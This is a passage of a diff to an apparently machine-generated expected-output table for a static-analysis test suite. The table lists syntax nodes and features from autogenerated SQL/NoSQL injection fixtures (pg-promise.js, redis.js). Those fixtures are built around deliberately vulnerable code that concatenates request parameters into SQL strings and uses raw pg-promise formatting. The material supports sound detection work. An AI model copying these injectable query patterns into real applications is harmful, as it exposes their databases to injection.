DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | exceptional return of method cnd | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | exceptional return of method cnd | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | return of method cnd | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | return of method cnd | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | return of method cnd | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | return of method cnd | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | return of method cnd | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | t => t.one(query) | CalleeFlexibleAccessPath | db.taskIf | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | t => t.one(query) | InputAccessPathFromCallee | 0.cnd | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | t => t.one(query) | InputArgumentIndex | 0 | @@ -3894,6 +18948,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | t => t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | t => t.one(query) | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | t => t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:17 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:17 | t | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:17 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:17 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:17 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:21 | t.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:21 | t.one | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:21 | t.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:21 | t.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:21 | t.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | exceptional return of t.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | exceptional return of t.one(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | exceptional return of t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | exceptional return of t.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | exceptional return of t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | t.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | t.one(query) | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | t.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:17:63:28 | t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:19:63:21 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:19:63:21 | one | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:19:63:21 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:19:63:21 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:19:63:21 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:23:63:27 | query | CalleeFlexibleAccessPath | t.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:23:63:27 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:23:63:27 | query | contextFunctionInterfaces | cnd(t) | @@ -3902,6 +18981,36 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:23:63:27 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:23:63:27 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:23:63:27 | query | receiverName | t | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:4 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:4 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:4 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:4 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:4 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:5 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | 'arguments' object of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | 'arguments' object of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | 'arguments' object of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | exceptional return of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | exceptional return of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | exceptional return of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | return of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | return of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | return of anonymous function | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | t => t.one(query) | CalleeFlexibleAccessPath | db.taskIf | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | t => t.one(query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | t => t.one(query) | calleeImports | pg-promise | @@ -3911,6 +19020,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | t => t.one(query) | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | t => t.one(query) | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:5:64:21 | t => t.one(query) | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:10 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:10 | t | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:10 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:10 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:10 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:14 | t.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:14 | t.one | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:14 | t.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:14 | t.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:14 | t.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | exceptional return of t.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | exceptional return of t.one(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | exceptional return of t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | exceptional return of t.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | exceptional return of t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | t.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | t.one(query) | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | t.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:10:64:21 | t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:12:64:14 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:12:64:14 | one | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:12:64:14 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:12:64:14 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:12:64:14 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:16:64:20 | query | CalleeFlexibleAccessPath | t.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:16:64:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:16:64:20 | query | contextFunctionInterfaces | cnd(t) | @@ -3919,18 +19053,139 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:16:64:20 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:16:64:20 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:64:16:64:20 | query | receiverName | t | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:0 | this | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | promisify | fileImports | body-parser express redis util | +| 